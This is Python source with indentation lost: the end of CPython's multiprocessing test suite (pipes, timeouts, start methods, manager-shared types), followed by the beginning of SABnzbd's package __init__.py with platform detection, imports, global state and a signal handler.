self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
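# Illustrative sketch (editorial addition, not part of the original test
# suite): multiprocessing.connection.wait() multiplexes pipe ends and process
# sentinels, which is what TestWait exercises above. The helper names below
# are hypothetical.
def _example_wait_child(conn):
    conn.send('done')
    conn.close()
def _example_wait_usage():
    from multiprocessing.connection import wait
    r, w = multiprocessing.Pipe(duplex=False)
    p = multiprocessing.Process(target=_example_wait_child, args=(w,))
    p.start()
    w.close()
    messages = []
    while True:
        # Block until the read end has data; EOFError signals that the
        # child closed its end of the pipe.
        if r in wait([r, p.sentinel], timeout=10):
            try:
                messages.append(r.recv())
            except EOFError:
                break
        else:
            break
    p.join()
    return messages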
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
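# Illustrative sketch (editorial addition, not part of the original test
# suite): get_context() returns an object exposing the multiprocessing API
# bound to a single start method, which is what check_context() above relies
# on. The helper names below are hypothetical.
def _example_ctx_child(q):
    q.put(42)
def _example_spawn_context():
    ctx = multiprocessing.get_context('spawn')
    q = ctx.Queue()
    p = ctx.Process(target=_example_ctx_child, args=(q,))
    p.start()
    value = q.get(timeout=30)
    p.join()
    return value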
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
    In the following unit tests the base type is created in the parent
    process, the @classmethod represents the worker process, and the
    shared object is readable and writable by both.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
    def test_rlock(self, lname="RLock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
__init__.py
|
#!/usr/bin/python3 -OO
# Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Imported to be referenced from other files directly
from sabnzbd.version import __version__, __baseline__
import os
import logging
import datetime
import tempfile
import pickle
import gzip
import subprocess
import time
import socket
import cherrypy
import sys
import re
import ssl
from threading import Lock, Thread
##############################################################################
# Determine platform flags
##############################################################################
WIN32 = DARWIN = FOUNDATION = WIN64 = False
KERNEL32 = None
if os.name == "nt":
WIN32 = True
from util.apireg import del_connection_info
try:
import ctypes
KERNEL32 = ctypes.windll.LoadLibrary("Kernel32.dll")
except:
pass
elif os.name == "posix":
ORG_UMASK = os.umask(18)
os.umask(ORG_UMASK)
import platform
if platform.system().lower() == "darwin":
DARWIN = True
        # 12 = Sierra, 11 = El Capitan, 10 = Yosemite, 9 = Mavericks, 8 = Mountain Lion
DARWIN_VERSION = int(platform.mac_ver()[0].split(".")[1])
try:
import Foundation
import sabnzbd.utils.sleepless as sleepless
FOUNDATION = True
except:
pass
# Now we can import safely
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.postproc import PostProcessor
from sabnzbd.downloader import Downloader
from sabnzbd.assembler import Assembler
from sabnzbd.rating import Rating
import sabnzbd.misc as misc
import sabnzbd.filesystem as filesystem
import sabnzbd.powersup as powersup
from sabnzbd.dirscanner import DirScanner, process_nzb_archive_file, process_single_nzb
from sabnzbd.urlgrabber import URLGrabber
import sabnzbd.scheduler as scheduler
import sabnzbd.rss as rss
import sabnzbd.emailer as emailer
from sabnzbd.articlecache import ArticleCache
import sabnzbd.newsunpack
import sabnzbd.encoding as encoding
import sabnzbd.config as config
from sabnzbd.bpsmeter import BPSMeter
import sabnzbd.cfg as cfg
import sabnzbd.database
import sabnzbd.lang as lang
import sabnzbd.par2file as par2file
import sabnzbd.api
import sabnzbd.interface
import sabnzbd.nzbstuff as nzbstuff
import sabnzbd.directunpacker as directunpacker
from sabnzbd.decorators import synchronized
from sabnzbd.constants import (
NORMAL_PRIORITY,
VALID_ARCHIVES,
REPAIR_REQUEST,
QUEUE_FILE_NAME,
QUEUE_VERSION,
QUEUE_FILE_TMPL,
)
import sabnzbd.getipaddress as getipaddress
LINUX_POWER = powersup.HAVE_DBUS
START = datetime.datetime.now()
MY_NAME = None
MY_FULLNAME = None
RESTART_ARGS = []
NEW_VERSION = (None, None)
DIR_HOME = None
DIR_APPDATA = None
DIR_LCLDATA = None
DIR_PROG = None
DIR_INTERFACES = None
DIR_LANGUAGE = None
DIR_PID = None
QUEUECOMPLETE = None # stores the nice name of the action
QUEUECOMPLETEACTION = None # stores the name of the function to be called
QUEUECOMPLETEARG = None  # stores any extra argument that needs to be passed
DAEMON = None
LOGFILE = None
WEBLOGFILE = None
LOGHANDLER = None
GUIHANDLER = None
LOG_ALL = False
AMBI_LOCALHOST = False
WIN_SERVICE = None # Instance of our Win32 Service Class
BROWSER_URL = None
CMDLINE = "" # Rendering of original command line arguments
CERTIFICATE_VALIDATION = True
NO_DOWNLOADING = False # When essentials are missing (SABYenc/par2/unrar)
WEB_DIR = None
WEB_DIR_CONFIG = None
WIZARD_DIR = None
WEB_COLOR = None
SABSTOP = False
RESTART_REQ = False
PAUSED_ALL = False
TRIGGER_RESTART = False # To trigger restart for Scheduler, WinService and Mac
WINTRAY = None # Thread for the Windows SysTray icon
WEBUI_READY = False
LAST_WARNING = None
LAST_ERROR = None
EXTERNAL_IPV6 = False
LAST_HISTORY_UPDATE = 1
# Performance measure for dashboard
PYSTONE_SCORE = 0
DOWNLOAD_DIR_SPEED = 0
COMPLETE_DIR_SPEED = 0
INTERNET_BANDWIDTH = 0
__INITIALIZED__ = False
__SHUTTING_DOWN__ = False
##############################################################################
# Signal Handler
##############################################################################
def sig_handler(signum=None, frame=None):
global SABSTOP, WINTRAY
if sabnzbd.WIN32 and signum is not None and DAEMON and signum == 5:
# Ignore the "logoff" event when running as a Win32 daemon
return True
if signum is not None:
logging.warning(T("Signal %s caught, saving and exiting..."), signum)
try:
save_state()
sabnzbd.zconfig.remove_server()
finally:
if sabnzbd.WIN32:
from util.apireg import del_connection_info
del_connection_info()
if sabnzbd.WINTRAY:
sabnzbd.WINTRAY.terminate = True
time.sleep(0.5)
else:
pid_file()
SABSTOP = True
os._exit(0)
##############################################################################
# Initializing
##############################################################################
INIT_LOCK = Lock()
def get_db_connection(thread_index=0):
# Create a connection and store it in the current thread
if not (hasattr(cherrypy.thread_data, "history_db") and cherrypy.thread_data.history_db):
cherrypy.thread_data.history_db = sabnzbd.database.HistoryDB()
return cherrypy.thread_data.history_db
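# Illustrative sketch (editorial addition, not part of SABnzbd): the function
# above lazily caches one HistoryDB handle per CherryPy worker thread on
# cherrypy.thread_data; initialize() below subscribes it to the engine's
# "start_thread" channel. The same lazy per-thread caching, expressed with a
# plain threading.local object (hypothetical name, documentation only):
def _example_per_thread_handle(storage, factory):
    """ Return the per-thread object stored on `storage`, creating it on first use """
    if not hasattr(storage, "handle"):
        storage.handle = factory()
    return storage.handle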
@synchronized(INIT_LOCK)
def initialize(pause_downloader=False, clean_up=False, evalSched=False, repair=0):
